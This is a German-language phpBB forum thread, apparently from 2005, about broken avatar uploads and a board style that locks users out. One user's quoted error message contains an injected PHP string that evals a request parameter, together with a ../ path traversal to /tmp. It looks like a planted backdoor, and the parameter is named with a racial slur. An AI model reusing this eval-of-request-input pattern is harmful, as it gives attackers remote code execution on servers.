avantar hochladen geht ned

Alles was sonst nirgens rein passt.

Moderatoren: HaPe, Moderatoren

Benutzeravatar
senatorandy
Ordentliches Forumsmitglied
Beiträge: 23
Registriert: Mi Nov 16, 2005 17:05
Wohnort: 35719 Angelburg

avantar hochladen geht ned

Beitrag von senatorandy »

hi, ich bastel schon ne zeit am avantar rum weils zu groß war. jetzt hab ichs auf 99 x 69 und 5,37 kb......und jpg...........und geht immer noch ned.
wie bekomm ich´s dahin wo´s hin soll ?

gruß andy
Benutzeravatar
EWO
Spitzen-Mitglied
Beiträge: 8639
Registriert: Mi Sep 08, 2004 19:42
Wohnort: KIEL
Kontaktdaten:

Beitrag von EWO »

Avatar darf nicht größer als 100 Pixel sein, die Höhe nicht größer als 75 Pixel, und die Dateigröße darf maximal 7 KB betragen.
Dann sollte es ohne Probleme klappen.

- Nach dem einloggen ins Profil gehen
- den Punkt "Avatar hochladen" aufsuchen
- Durchsuchen anklicken
- Ort wo das Bildchen liegt auf dem eigenen Rechner suchen
- hochladen, FERTIG
Benutzeravatar
senatorandy
Ordentliches Forumsmitglied
Beiträge: 23
Registriert: Mi Nov 16, 2005 17:05
Wohnort: 35719 Angelburg

Beitrag von senatorandy »

öh......aba......laut der größe wie ich das jetzt hab (siehe oben) bin ich schon drunter . :?

gruß andy
Benutzeravatar
DLR
Spitzen-Mitglied
Beiträge: 581
Registriert: Do Sep 23, 2004 17:19
Wohnort: Ringsberg
Kontaktdaten:

Beitrag von DLR »

Send das Bildchen mal an EWO bridgestone@ewo-motorsport.de oder an mich bd@dau-line.de

Vielleicht können wir dir dann helfen...
Benutzeravatar
DLR
Spitzen-Mitglied
Beiträge: 581
Registriert: Do Sep 23, 2004 17:19
Wohnort: Ringsberg
Kontaktdaten:

Beitrag von DLR »

Hab es mit deinem Bildchen Versucht. Weder JPG, PNG oder gif funktionieren. Auch wenn ich es auf 1*1 Pixel verkleinere funktioniert es nicht. Mein erster Verdacht war danach, dass er evt. nicht jedes Auto nímmt :P . Aber es scheint ein allgemeines Problem zu sein. Denn ich habe testweise mal mein Avatar auf meinen PC gespeichert und konnte es danach ebenfalls nicht hochladen. Angeblich war es ebenfalls auf einmal zu groß....
@EWO: Sind die Einstellungen nach dem großen Wiedererstellen des Forums irgendwie verschütt gegangen? Also: Das Forum sagt auch, dass Bilder mit 1*1 Pixel und 0,3 kb zu groß sind!! :?:
Benutzeravatar
senatorandy
Ordentliches Forumsmitglied
Beiträge: 23
Registriert: Mi Nov 16, 2005 17:05
Wohnort: 35719 Angelburg

Beitrag von senatorandy »

na dann bin ich ja erleichtert :) , dacht schon ich wär zu blöd dafür. :wink: .

gruß andy
Benutzeravatar
EWO
Spitzen-Mitglied
Beiträge: 8639
Registriert: Mi Sep 08, 2004 19:42
Wohnort: KIEL
Kontaktdaten:

Beitrag von EWO »

DOnnerschlag.
Bei mir kommt zwar keine fehlermeldung beim Hochladen eines Avatars aber es kommt scheinbar nicht dort an, wo es hinsoll.
Es wird jedenfalls nix mehr angezeigt. EWO (wohlgemerkt als admin) ist sozusagen unsichtbar. Hier ist mehr Wissen gefragt.
Benutzeravatar
Imsefix
Ordentliches Forumsmitglied
Beiträge: 30
Registriert: Fr Aug 26, 2005 20:37
Wohnort: Braunschweig

Beitrag von Imsefix »

Hi,
ich hatte das vor ca. 2 Monaten auch schon mit dem Ergebniss abgebrochen. Will damit sagen, dass es nicht mit dem großen Wiedererstellen des Forums in Verbindung stehen muß.
Gruß
Imsefix
Geschwindigkeit wird am Puls gemessen
Benutzeravatar
Henryk
Ordentliches Forumsmitglied
Beiträge: 41
Registriert: Mi Sep 08, 2004 09:22
Wohnort: Nordhausen
Kontaktdaten:

Avatare gehen wieder!

Beitrag von Henryk »

Unser Provider hatte beim Upload Pfad für Dateien tmp und temp verwechselt...

Gruss

Henryk
*** Nur quer biste wer ***
Benutzeravatar
EWO
Spitzen-Mitglied
Beiträge: 8639
Registriert: Mi Sep 08, 2004 19:42
Wohnort: KIEL
Kontaktdaten:

Beitrag von EWO »

EWO hat geschrieben:DOnnerschlag.
Bei mir kommt zwar keine fehlermeldung beim Hochladen eines Avatars aber es kommt scheinbar nicht dort an, wo es hinsoll.
Es wird jedenfalls nix mehr angezeigt. EWO (wohlgemerkt als admin) ist sozusagen unsichtbar. Hier ist mehr Wissen gefragt.

Nun geht's wieder.
Danke Henryk. Sieht doch besser aus mit Logo.

gruß EWO
bb

Beitrag von bb »

na also, es geht voran!

Hoffentlich gibt es auch bald eine Lösung für das Skin-Problem. :wink:


Klaus (bb-slalom)
Benutzeravatar
EWO
Spitzen-Mitglied
Beiträge: 8639
Registriert: Mi Sep 08, 2004 19:42
Wohnort: KIEL
Kontaktdaten:

Beitrag von EWO »

bb hat geschrieben:na also, es geht voran!

Hoffentlich gibt es auch bald eine Lösung für das Skin-Problem. :wink:


Klaus (bb-slalom)
SKIN-Problem ?
SKIN heißt Haut oder sowas.
Klaus ich glaube du must noch mal erläutern.
bbslalom

Beitrag von bbslalom »

Skins
Mit Hilfe einer Skin (englisch für Haut) kann der Anwender das Aussehen von Programmen verändern, ohne dass das Programm dadurch beeinflußt wird. Vergleichbar mit den verschiedenfarbigen Covern von Handys: "Das Handy, farblich passend zum Kleid!"
(http://www.www-kurs.de/gloss_s.htm)

Das EWO-Forum lässt sich für den angemeldeten User im "BOARD STYLE" von "SubSilver" auf "FI black" umstellen

Vorsicht Kinder, nicht nachmachen!

Danach bleibt der Zugang versperrt - es kommt immer die Fehlermeldung
"phpBB : Kritischer Fehler
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
DEBUG MODE
Line : 372
File : functions.php"

Also: gegenwärtig bloß nicht die Farben des Forums ändern. Das führt zum sofortigen - und gegenwärtig auch unwiderruflichen Ausschluss.

Klaus
Benutzeravatar
EWO
Spitzen-Mitglied
Beiträge: 8639
Registriert: Mi Sep 08, 2004 19:42
Wohnort: KIEL
Kontaktdaten:

Beitrag von EWO »

Welcher User geht denn bei dir nicht mehr ?

bb
angemeldet am 22.12.2005
0 postings

bb-slalom
angemeldet am 09.09.2004
39 postings
bbslalom

Beitrag von bbslalom »

bbeide :wink:

... mit unterschiedlichen browsern - sobald ich mich einlogge, kommt diese Fehlerbeschreibung. Und das ganze passiert mit der Auswahl von FI black - und ist dann nicht mehr änderbar.
(... und natürlich kann mein Account bb von heute dann wieder gelöscht werden)

Klaus
Antworten